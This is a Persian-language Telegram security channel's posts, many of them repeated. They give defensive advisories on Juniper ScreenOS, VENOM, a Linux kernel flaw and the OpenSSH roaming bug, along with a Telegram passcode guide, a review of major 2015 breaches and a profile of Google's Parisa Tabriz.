هشدار در خصوص آسیب پذیری های فایروال NetScreen شرکت جونیپر
در روزهای اخیر شرکت جونیپر چند وصلهی اضطراری را برای بستن حفره های امنیتی متعلق به دو در پشتی(backdoor) در محصولات خود منتشر کرده است. یکی از درهای پشتی (CVE-2015-7756) اجازه رمزگشایی پسیو ترافیک VPN عبوری از تجهیز و دیگری (CVE-2015-7755) اجازه دسترسی مدیریتی از راه دور از طریق SSH یا Telnet را فراهم می کند.طبق بررسی های کارشناسان جونیپر، نسخه های ScreenOS 6.2.0r15 تا 6.2.0r18 و 6.3.0r12تا 6.3.0r20 دارای این آسیب پذیرها می باشند. البته درپشتی دسترسی مدیریتی روی نسخه های قدیمی تر ScreenOS وجود ندارد، بنابراین سری 6.2.0 در این مورد آسیب پذیر نیست ولی آسیب پذیری VPN را داراست.
با توجه به این موضوع، به تمامی مدیران شبکه پیشنهاد می گردد در صورتی که از این نسخه از محصولات جونیپر استفاده میکنند، هرچه سریع تر نسبت به بروز رسانی تجهیزات اقدام نمایند.
------
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
در روزهای اخیر شرکت جونیپر چند وصلهی اضطراری را برای بستن حفره های امنیتی متعلق به دو در پشتی(backdoor) در محصولات خود منتشر کرده است. یکی از درهای پشتی (CVE-2015-7756) اجازه رمزگشایی پسیو ترافیک VPN عبوری از تجهیز و دیگری (CVE-2015-7755) اجازه دسترسی مدیریتی از راه دور از طریق SSH یا Telnet را فراهم می کند.طبق بررسی های کارشناسان جونیپر، نسخه های ScreenOS 6.2.0r15 تا 6.2.0r18 و 6.3.0r12تا 6.3.0r20 دارای این آسیب پذیرها می باشند. البته درپشتی دسترسی مدیریتی روی نسخه های قدیمی تر ScreenOS وجود ندارد، بنابراین سری 6.2.0 در این مورد آسیب پذیر نیست ولی آسیب پذیری VPN را داراست.
با توجه به این موضوع، به تمامی مدیران شبکه پیشنهاد می گردد در صورتی که از این نسخه از محصولات جونیپر استفاده میکنند، هرچه سریع تر نسبت به بروز رسانی تجهیزات اقدام نمایند.
------
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
آسیبپذیری venom
نام این آسیبپذیری برگرفته از حروف آغازین عبارت Virtualized Environment Neglected Operations Manipulation بوده و به مفهوم دستکاری بخش مورد غفلت واقع شدهای است که در اغلب مجازیسازها مورد استفاده قرار میگیرد. این بخش، کنترلر دیسکهای فلاپی مجازی در امولاتور متن باز QEMU است.
این آسیبپذیری یکی از جدیترین آسیبپذیریهای کشف شده در نرمافزارهای مجازیساز است و با سوءاستفاده از آن میتوان به ماشینهایی که بهصورت مجازی پیادهسازی شدهاند، نفوذ کرد.
www.nsec.ir/news/255
---------
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
نام این آسیبپذیری برگرفته از حروف آغازین عبارت Virtualized Environment Neglected Operations Manipulation بوده و به مفهوم دستکاری بخش مورد غفلت واقع شدهای است که در اغلب مجازیسازها مورد استفاده قرار میگیرد. این بخش، کنترلر دیسکهای فلاپی مجازی در امولاتور متن باز QEMU است.
این آسیبپذیری یکی از جدیترین آسیبپذیریهای کشف شده در نرمافزارهای مجازیساز است و با سوءاستفاده از آن میتوان به ماشینهایی که بهصورت مجازی پیادهسازی شدهاند، نفوذ کرد.
www.nsec.ir/news/255
---------
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
آموزش گذاشتن رمز عبور (Passcode) بر روی تلگرام
۱- ابتدا پیام رسان Telegram را اجرا کرده و سپس وارد منو برنامه شوید.
۲- گزینه Settings را لمس کنید.
۳- در بخش Settings گزینه Privacy and Security را انتخاب کنید.
۴- در مرحله بعدی و از بخش Security گزینه Passcode Lock را انتخاب کنید.
۵-در مقابل گزینه Passcode Lock یک زبانه وجود دارد که برای قرار داد رمز عبور باید آن را به سمت راست بکشید تا فعال شود.
۶- در مرحله بعدی شما باید یک رمز ۴ رقمی (Passcode) برای تلگرام خود انتخاب کنید.
۷- پس از وارد کردن کد ۴ رقمی میبایست برای اطمینان از صحت رمز وارد شده کد را مجدد وارد کنید.
کار تمام است و هم اکنون تلگرام شما دارای Passcode شده و هرگاه که قصد وارد شدن به تلگرام را داشته باشید ابتدا می بایست کد ۴ رقمی را وارد کنید.
اما قسمت Passcode Lock دارای یکسری تنظیمات می باشد که در نکات زیر به آن ها اشاره نموده ایم:
• گزینه Passcode Lock: با استفاده از زبانه موجود در این گزینه، می توانید قابلیت رمزگذاری بر روی تلگرام را فعال/غیر فعال کنید.
• گزینه Change Passcode: برای تغییر رمز عبور وارد از این گزینه استفاده کنید.
• گزینه Auto Lock: برای تغییر زمان قفل خودکار برنامه از این گزینه استفاده کنید.
همچنین شما پس از اتمام کار خود در تلگرام می توانید با لمس آیکن قفل که در بالای برنامه ظاهر می شود، تلگرام را به صورت دستی قفل کنید.
—-------
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
۱- ابتدا پیام رسان Telegram را اجرا کرده و سپس وارد منو برنامه شوید.
۲- گزینه Settings را لمس کنید.
۳- در بخش Settings گزینه Privacy and Security را انتخاب کنید.
۴- در مرحله بعدی و از بخش Security گزینه Passcode Lock را انتخاب کنید.
۵-در مقابل گزینه Passcode Lock یک زبانه وجود دارد که برای قرار داد رمز عبور باید آن را به سمت راست بکشید تا فعال شود.
۶- در مرحله بعدی شما باید یک رمز ۴ رقمی (Passcode) برای تلگرام خود انتخاب کنید.
۷- پس از وارد کردن کد ۴ رقمی میبایست برای اطمینان از صحت رمز وارد شده کد را مجدد وارد کنید.
کار تمام است و هم اکنون تلگرام شما دارای Passcode شده و هرگاه که قصد وارد شدن به تلگرام را داشته باشید ابتدا می بایست کد ۴ رقمی را وارد کنید.
اما قسمت Passcode Lock دارای یکسری تنظیمات می باشد که در نکات زیر به آن ها اشاره نموده ایم:
• گزینه Passcode Lock: با استفاده از زبانه موجود در این گزینه، می توانید قابلیت رمزگذاری بر روی تلگرام را فعال/غیر فعال کنید.
• گزینه Change Passcode: برای تغییر رمز عبور وارد از این گزینه استفاده کنید.
• گزینه Auto Lock: برای تغییر زمان قفل خودکار برنامه از این گزینه استفاده کنید.
همچنین شما پس از اتمام کار خود در تلگرام می توانید با لمس آیکن قفل که در بالای برنامه ظاهر می شود، تلگرام را به صورت دستی قفل کنید.
—-------
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌افشای آسیب پذیری خطرناک در هسته اصلی سیستم عامل لینوکس:
مرکز رسیدگی به حوادث امنیتی آمریکا (US_CERT) اعلام کرد اسیب پذیری کشف شده در کرنل سیستم عامل لینوکس که به تازگی کشف شده است تمامی دستگاههای PC و سرور ها و دستگاههای برپایه اندرویید را تحت الشعاع قرار می دهد. ین آسیب پذیری باعث میشود که مهاجم کنترل کامل دستگاه مورد تهاجم را به دست بگیرد.
برای سیستم عامل های RED HAT و DEBIAN راهکاهرهای رفع آین مشکل در لینک های زیر قرار داده شده است و ضروریست مدیران سیستم ها در اسرع وقت نسبت به رفع مشکل اقدام نمایند:
https://security-tracker.debian.org/tracker/CVE-2016-0728
https://access.redhat.com/security/cve/CVE-2016-0728
متن خبر اصلی به شرح زیر می باشد:
—-------
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
Linux Kernel Vulnerability
01/19/2016 07:59 PM EST
Original release date: January 19, 2016
US-CERT is aware of a Linux kernel vulnerability affecting Linux PCs and servers and Android-based devices. Exploitation of this vulnerability may allow an attacker to take control of an affected system.
US-CERT recommends that users and administrators review the Redhat Security Blog and the Debian Security Bug Tracker for additional details and refer to their Linux or Unix-based OS vendors for appropriate patches.
—-------
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
مرکز رسیدگی به حوادث امنیتی آمریکا (US_CERT) اعلام کرد اسیب پذیری کشف شده در کرنل سیستم عامل لینوکس که به تازگی کشف شده است تمامی دستگاههای PC و سرور ها و دستگاههای برپایه اندرویید را تحت الشعاع قرار می دهد. ین آسیب پذیری باعث میشود که مهاجم کنترل کامل دستگاه مورد تهاجم را به دست بگیرد.
برای سیستم عامل های RED HAT و DEBIAN راهکاهرهای رفع آین مشکل در لینک های زیر قرار داده شده است و ضروریست مدیران سیستم ها در اسرع وقت نسبت به رفع مشکل اقدام نمایند:
https://security-tracker.debian.org/tracker/CVE-2016-0728
https://access.redhat.com/security/cve/CVE-2016-0728
متن خبر اصلی به شرح زیر می باشد:
—-------
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
Linux Kernel Vulnerability
01/19/2016 07:59 PM EST
Original release date: January 19, 2016
US-CERT is aware of a Linux kernel vulnerability affecting Linux PCs and servers and Android-based devices. Exploitation of this vulnerability may allow an attacker to take control of an affected system.
US-CERT recommends that users and administrators review the Redhat Security Blog and the Debian Security Bug Tracker for additional details and refer to their Linux or Unix-based OS vendors for appropriate patches.
—-------
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌آسیب پذیری در ssh
لطفا سریعا موارد زیر را برای توزیع های لینوکس که از نسخه 5.4 الی 7.1 نرم افزار openssh استفاده می کنند اعمال کنند مانند
CentOS Linux 7.x
RHEL (RedHat Enterprise Linux) 7.x
Debian Linux (squeeze, wheezy, jessie, stretch, and sid release)
Ubuntu Linux 15.10
Ubuntu Linux 15.04
Ubuntu Linux 14.04 LTS
Ubuntu Linux 12.04 LTS
SUSE Linux Enterprise Server 12 (SLES 12)
SUSE Linux Enterprise Server 12 Service Pack 1 (SLES 12 SP1)
SUSE Linux Enterprise Server 11 Service Pack 4 (SLES 11 SP4)
SUSE Linux Enterprise Server 11 Service Pack 3 (SLES 11 SP3)
openSUSE 13.2
openSUSE Leap 42.1
روش حل اپگرید کردن بسته ssh در سیستم عامل
و دوم اضافه کردن در فایل کانفیگ
/etc/ssh/ssh_config
عبارت
UseRoaming no
است
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
لطفا سریعا موارد زیر را برای توزیع های لینوکس که از نسخه 5.4 الی 7.1 نرم افزار openssh استفاده می کنند اعمال کنند مانند
CentOS Linux 7.x
RHEL (RedHat Enterprise Linux) 7.x
Debian Linux (squeeze, wheezy, jessie, stretch, and sid release)
Ubuntu Linux 15.10
Ubuntu Linux 15.04
Ubuntu Linux 14.04 LTS
Ubuntu Linux 12.04 LTS
SUSE Linux Enterprise Server 12 (SLES 12)
SUSE Linux Enterprise Server 12 Service Pack 1 (SLES 12 SP1)
SUSE Linux Enterprise Server 11 Service Pack 4 (SLES 11 SP4)
SUSE Linux Enterprise Server 11 Service Pack 3 (SLES 11 SP3)
openSUSE 13.2
openSUSE Leap 42.1
روش حل اپگرید کردن بسته ssh در سیستم عامل
و دوم اضافه کردن در فایل کانفیگ
/etc/ssh/ssh_config
عبارت
UseRoaming no
است
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌How To Patch and Protect OpenSSH Client Vulnerability CVE-2016-0777 and CVE-2016-0778 [ 14/Jan/2016 ]
by Vivek Gite on January 15, 2016 last updated January 16, 2016
in CentOS, Cryptography, Debian / Ubuntu, FreeBSD, Linux, Openbsd, RedHat and Friends, UNIX
The OpenSSH project released an ssh client bug info that can leak private keys to malicious servers. A man-in-the-middle kind of attack identified and fixed in OpenSSH are dubbed CVE-2016-0777 and CVE-2016-0778. How do I fix OpenSSH's client vulnerability on a Linux or Unix-like operating system?
http://www.cyberciti.biz/faq/howto-openssh-client-security-update-cve-0216-0777-cve-0216-0778/
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
by Vivek Gite on January 15, 2016 last updated January 16, 2016
in CentOS, Cryptography, Debian / Ubuntu, FreeBSD, Linux, Openbsd, RedHat and Friends, UNIX
The OpenSSH project released an ssh client bug info that can leak private keys to malicious servers. A man-in-the-middle kind of attack identified and fixed in OpenSSH are dubbed CVE-2016-0777 and CVE-2016-0778. How do I fix OpenSSH's client vulnerability on a Linux or Unix-like operating system?
http://www.cyberciti.biz/faq/howto-openssh-client-security-update-cve-0216-0777-cve-0216-0778/
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌حملات سایبری و هکهای فراموشنشدنی سال ۲۰۱۵
سال ۲۰۱۵ نشان داد که شدت و پیچیدگی حملات سایبری سیری صعودی در پیش دارد و هر سال بیش از پارسال رخنههای پرشمار امنیتی به صدر خبرهای مهم راه مییابند. این گزارش نگاهی است به مهمترین نفوذهای خبرساز سالی که گذشت.
هک و نفوذ به بخشی جداییناپذیر از زندگی دیجیتال کاربران در سراسر جهان تبدیل شدهاند. هکرها با گذشت زمان زبدهتر میشوند و تکنیکهای پیچیدهتری را برای نفوذ به حریم خصوصی کاربران و سرقت داراییهای دیجیتال آنها به کار میگیرند. هیچ شخص یا شبکهای در برابر این حملات گسترده سایبری مصون نیست و تعداد قربانیان همواره رو به افزایش است.
به گزارش مجله فنآوری "وایرد" تا اواخر ماه دسامبر بیش از ۷۵۰ رخنه امنیتی گسترده در سال ۲۰۱۵ گزارش شد که در نتیجه آنها بیش از ۱۷۸ میلیون داده دیجیتال کاربران ربوده شد. سرقت دادهها همه حوزهها از جمله دولت و تکنولوژی، بهداشت و محیط زیست و جامعه مدنی را هدف قرار داده و بیرحمانه در حال گسترش دامنه نفوذ خود است.
در سال ۲۰۱۵ چندین رویداد مهم و تحولساز در دنیای امنیت و نفوذ آنلاین رخ داد که بازنگری آنها شاید بتواند یادآوری موثری باشد برای تاکید بر اهمیت حریم خصوصی و حراست از داراییهای آنلاین کاربران در سراسر جهان.
در ادامه برخی از مهم ترین این حملات را اشاره خواهیم کرد
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
سال ۲۰۱۵ نشان داد که شدت و پیچیدگی حملات سایبری سیری صعودی در پیش دارد و هر سال بیش از پارسال رخنههای پرشمار امنیتی به صدر خبرهای مهم راه مییابند. این گزارش نگاهی است به مهمترین نفوذهای خبرساز سالی که گذشت.
هک و نفوذ به بخشی جداییناپذیر از زندگی دیجیتال کاربران در سراسر جهان تبدیل شدهاند. هکرها با گذشت زمان زبدهتر میشوند و تکنیکهای پیچیدهتری را برای نفوذ به حریم خصوصی کاربران و سرقت داراییهای دیجیتال آنها به کار میگیرند. هیچ شخص یا شبکهای در برابر این حملات گسترده سایبری مصون نیست و تعداد قربانیان همواره رو به افزایش است.
به گزارش مجله فنآوری "وایرد" تا اواخر ماه دسامبر بیش از ۷۵۰ رخنه امنیتی گسترده در سال ۲۰۱۵ گزارش شد که در نتیجه آنها بیش از ۱۷۸ میلیون داده دیجیتال کاربران ربوده شد. سرقت دادهها همه حوزهها از جمله دولت و تکنولوژی، بهداشت و محیط زیست و جامعه مدنی را هدف قرار داده و بیرحمانه در حال گسترش دامنه نفوذ خود است.
در سال ۲۰۱۵ چندین رویداد مهم و تحولساز در دنیای امنیت و نفوذ آنلاین رخ داد که بازنگری آنها شاید بتواند یادآوری موثری باشد برای تاکید بر اهمیت حریم خصوصی و حراست از داراییهای آنلاین کاربران در سراسر جهان.
در ادامه برخی از مهم ترین این حملات را اشاره خواهیم کرد
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
۱📌) نفوذ هکرهای چینی به اطلاعات پرسنل نظامی و اطلاعاتی آمریکا
در ماه ژوئن ۲۰۱۵ نفوذگران چینی با هک کردن سیستمهای کامپیوتری دفتر مدیریت پرسنلی آمریکا (OPM) توانستند دادههای حساس و مهم مرتبط با مدارک و "تاییدیههای امنیتی" میلیونها نفر از کارکنان سرویسهای نظامی، اطلاعاتی و جاسوسی ایالات متحده را بربایند.
این ماجرا به بزرگترین نفوذ امنیتی به دادههای دولتی در تاریخ آمریکا موسوم شد و در جریان آن اطلاعات بیش از ۲۱ میلیون نفر از کارکنان دولت ربوده شد. برخی از مقامهای دولت آمریکا انگشت اتهام را به سوی دولت چین نشانه گرفتند، اما دولت چین با رد این اتهامات گفت که این عملیات کار مجرمان سازمانیافته بوده است.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
در ماه ژوئن ۲۰۱۵ نفوذگران چینی با هک کردن سیستمهای کامپیوتری دفتر مدیریت پرسنلی آمریکا (OPM) توانستند دادههای حساس و مهم مرتبط با مدارک و "تاییدیههای امنیتی" میلیونها نفر از کارکنان سرویسهای نظامی، اطلاعاتی و جاسوسی ایالات متحده را بربایند.
این ماجرا به بزرگترین نفوذ امنیتی به دادههای دولتی در تاریخ آمریکا موسوم شد و در جریان آن اطلاعات بیش از ۲۱ میلیون نفر از کارکنان دولت ربوده شد. برخی از مقامهای دولت آمریکا انگشت اتهام را به سوی دولت چین نشانه گرفتند، اما دولت چین با رد این اتهامات گفت که این عملیات کار مجرمان سازمانیافته بوده است.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌2- نفوذ به متخصصان نفوذ؛ حمله هکرها به کسپرسکی
کمپانی کسپرسکی، مستقر در مسکو، یکی از مهمترین کمپانیهای امنیت دیجیتال و تولید آنتیویروس در جهان است که صدها متخصص زبده از سراسر جهان در آن مشغول کارند. گروهی از هکرها که گفته میشود احتمالا از طراحان "استاکسنت" و "دیوکیو" بودهاند، شبکه این کمپانی امنیتی را هدف قرار دادند تا اطلاعاتی که این کمپانی از حملات سایبری تحت حمایت دولتها در اختیار دارد را بربایند.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
کمپانی کسپرسکی، مستقر در مسکو، یکی از مهمترین کمپانیهای امنیت دیجیتال و تولید آنتیویروس در جهان است که صدها متخصص زبده از سراسر جهان در آن مشغول کارند. گروهی از هکرها که گفته میشود احتمالا از طراحان "استاکسنت" و "دیوکیو" بودهاند، شبکه این کمپانی امنیتی را هدف قرار دادند تا اطلاعاتی که این کمپانی از حملات سایبری تحت حمایت دولتها در اختیار دارد را بربایند.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌3- نفوذ به ایمیلهای شخصی رئیس سازمان اطلاعات مرکزی آمریکا
در دنیایی که کمپانیهای امنیتی و متخصصان هک و نفوذ هم قربانی حملات سایبری میشوند، هیچکسی در برابر حمله مصون نیست. در ماه اکتبر، هکری ناشناس که خود را "دانشآموز" معرفی کرده بود، اعلام کرد که به ایمیل شخصی جان برنان، رئیس سیا، نفوذ کرده و اطلاعات محرمانه دولتی و شخصی او را ربوده است.
این هکر اقدام خود را "واکنشی به سیاست خارجی آمریکا" خواند و گفت که با انگیزههای سیاسی به این کار دست زده تا دولت آمریکا را رسوا کند. اندکی بعد مشخص شد که این اقدام کار گروهی از هکرها بوده که با تکنیکهای ساده "مهندسی اجتماعی" توانستند به اطلاعات خصوصی جان برنان دست پیدا کنند.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
در دنیایی که کمپانیهای امنیتی و متخصصان هک و نفوذ هم قربانی حملات سایبری میشوند، هیچکسی در برابر حمله مصون نیست. در ماه اکتبر، هکری ناشناس که خود را "دانشآموز" معرفی کرده بود، اعلام کرد که به ایمیل شخصی جان برنان، رئیس سیا، نفوذ کرده و اطلاعات محرمانه دولتی و شخصی او را ربوده است.
این هکر اقدام خود را "واکنشی به سیاست خارجی آمریکا" خواند و گفت که با انگیزههای سیاسی به این کار دست زده تا دولت آمریکا را رسوا کند. اندکی بعد مشخص شد که این اقدام کار گروهی از هکرها بوده که با تکنیکهای ساده "مهندسی اجتماعی" توانستند به اطلاعات خصوصی جان برنان دست پیدا کنند.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌4- نفوذ به "لستپَس"؛ سرویس امن ذخیرهسازی پسوردها
سرویس "LastPass" یکی از محبوبترین برنامههای تولید و ذخیرهسازی رمزهای عبور امن است، اما این سرویس امنیتی هم در سال ۲۰۱۵ قربانی حملات هکرها شد. نفوذگران با حمله به شبکه "لستپس" به انبوهی از آدرسهای ایمیل و پسوردهای رمزگذاریشده و عباراتی که کاربران برای یادآوری پسوردها تعیین کرده بودند، دست یافتند.
مسئولان این کمپانی گفتهاند که از روشهای پیچیدهای برای رمزگذاری دادهها و "مَسترپسورد"های کاربران استفاده میکردند، اما با این حال تاکید کردند که اگر پسوردهای اصلی کاربران رمزهای سادهای بوده باشد، احتمالا هکرها میتوانند با شکستن آنها به مجموعه دادههای محرمانه آنها دست پیدا کنند. اگر از سرویسی مانند "لستپس" استفاده میکنید، حتما عبارت پیچیدهای متشکل از حروف بزرگ و کوچک و اعداد و نشانهها را به عنوان پسورد اصلی تعیین کنید تا قربانی ساده حملات مشابه نباشید.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
سرویس "LastPass" یکی از محبوبترین برنامههای تولید و ذخیرهسازی رمزهای عبور امن است، اما این سرویس امنیتی هم در سال ۲۰۱۵ قربانی حملات هکرها شد. نفوذگران با حمله به شبکه "لستپس" به انبوهی از آدرسهای ایمیل و پسوردهای رمزگذاریشده و عباراتی که کاربران برای یادآوری پسوردها تعیین کرده بودند، دست یافتند.
مسئولان این کمپانی گفتهاند که از روشهای پیچیدهای برای رمزگذاری دادهها و "مَسترپسورد"های کاربران استفاده میکردند، اما با این حال تاکید کردند که اگر پسوردهای اصلی کاربران رمزهای سادهای بوده باشد، احتمالا هکرها میتوانند با شکستن آنها به مجموعه دادههای محرمانه آنها دست پیدا کنند. اگر از سرویسی مانند "لستپس" استفاده میکنید، حتما عبارت پیچیدهای متشکل از حروف بزرگ و کوچک و اعداد و نشانهها را به عنوان پسورد اصلی تعیین کنید تا قربانی ساده حملات مشابه نباشید.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌با پریسا تبریز، «شاهزاده امنیت» گوگل آشنا شوید
فعالیت در عرصه تکنولوژی سایبری چیزی نبوده که پریسا تبریز از همان کودکی در مسیرش گام برداشته باشد. او که تازه در زمان کالج برای نخستین بار با کامپیوتر کار کرده، حالا در ۳۱ سالگی "شاهزاده امنیت" کمپانی گوگل لقب گرفته است.
"شاهزاده امنیت" لقب رسمی پریسا تبریز، مسئول امنیت اطلاعات بنگاه گوگل است. او زیاد اهل مصاحبه نیست و شمار عکسهایی که از او در اینترنت پیدا میشود، کمتر از انگشتان یک دست است. نشریه معتبر فوربس، سال گذشته پریسا تبریز را در میان یکی از ۳۰ چهرهموفق زیر ۳۰ سال در عرصه فناوری در کنار مارک زاکربرگ، پایهگذار فیسبوک، جای داد.
به تازگی خبرنگار مجله "ELLE" به دیدار این کارمند ارشد گوگل، در مقر این کمپانی در کالیفرنیا رفته و با وی گفتوگویی انجام داده است. گفتوگو در سالن کنفرانس گوگل انجام شده، چون طبق قوانین گوگل خبرنگاران اجازه ورود به ساختمانی را که پریسا تبریز در آن کار میکند، ندارند. در تمام مدت گفتوگو نیز یک محافظ این خبرنگار را همراهی میکرده؛ حتی هنگام رفتن به دستشویی.
پریسا تبریز، ۳۱ ساله، در حومه شهر شیکاگو بزرگ شده است؛ مادرش پرستاری آمریکایی − لهستانی و پدرش یک پزشک مهاجر ایرانی است. او در سال ۲۰۰۷ به استخدام گوگل درآمد و دهمین عضو تیم کوچکی از هکرها در این کمپانی شد. وظیفه این تیم در یک کلام تأمین امنیت نرمافزارهای گوگل بود. اما اکنون این تیم گسترش یافته و بیش از ۲۵۰ متخصص امنیتی در گوگل مشغول به کار هستند.
پریسا تبریز آن طور که خود میگوید، در دوران کالج برای نخستین بار با کامپیوتر کار کرده و تا آن موقع وقتش را با هنر، ورزش و رقابت با دو برادرش سپری میکرده است. او که در ریاضی و علوم استعداد داشته، سپس وارد دانشگاه ایلینوی شده و اندکی بعد نیز علاقه به امور کامپیوتری در او بیدار میشود.
مقاومت در برابر وسوسه پول
پریسا تبریز به گروه هکرهای "کلاه سفید" تعلق دارد که در مقابل هکرهای "کلاه سیاه" قرار دارند. کلاه سفیدها به سیستمها نفوذ میکنند، اما از این نفوذ نیت بدی ندارند و هدفشان بررسی امنیت سیستم، شناسایی خلاءهای امنیتی و ارتقای استحکام سیستم است. او توضیح میدهد که برای استخدام به دنبال آنهایی باید باشند که توانایی رخنه به بهترینسیستمها را داشته باشند، اما در عین حال اینقدر از نظر شخصیتی قوی باشند که بتوانند در مقابل وسوسه پول مقاومت کنند و خریدنی نباشند.
در حال حاضر شرکتها به کسانی که قادر به یافتن باگها در سیستم باشند و آنها را گزارش دهند، پول پرداخت میکنند. برای مثال این مبلغ نزد گوگل، آن طور که خانم تبریز میگوید، از ۲۵ هزار تا ۶۰ هزار دلار متغیر است.
طبق گزارش مجله "ELLE" بخشی که پریسا تبریز ریاست آن را بر عهده دارد، بیش از ۳۰ هکر در اروپا و آمریکا را شامل میشود که کارشان بررسی تهدیدات امنیتی به طور ویژه مربوط به موتور جستجوی گوگل کروم است.
همین تیم بود که در سال ۲۰۱۱ متوجه هک شدن شرکت هلندی "دیجی نوتار" شد. هکرها در این حمله موفق به ربودن گواهینامههای امنیتی دیجیتال این شرکت و صدور گواهینامههای جعلی شده بودند و به این ترتیب حساب جیمیل صدها هزار کاربر ایرانی را هک کردند.
پریسا تبریز با نگاهی به آینده از کمرنگشدن اهمیت "رمز عبور" خبر میدهد. به گفته او ورود به کامپیوترها و حسابهای کاربری از راههای فیزیکی صورت میگیرد، نظیر اثر انگشت که هم اکنون آیفون از آن بهرهمیگیرد و این تازه آغاز راه است.—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
فعالیت در عرصه تکنولوژی سایبری چیزی نبوده که پریسا تبریز از همان کودکی در مسیرش گام برداشته باشد. او که تازه در زمان کالج برای نخستین بار با کامپیوتر کار کرده، حالا در ۳۱ سالگی "شاهزاده امنیت" کمپانی گوگل لقب گرفته است.
"شاهزاده امنیت" لقب رسمی پریسا تبریز، مسئول امنیت اطلاعات بنگاه گوگل است. او زیاد اهل مصاحبه نیست و شمار عکسهایی که از او در اینترنت پیدا میشود، کمتر از انگشتان یک دست است. نشریه معتبر فوربس، سال گذشته پریسا تبریز را در میان یکی از ۳۰ چهرهموفق زیر ۳۰ سال در عرصه فناوری در کنار مارک زاکربرگ، پایهگذار فیسبوک، جای داد.
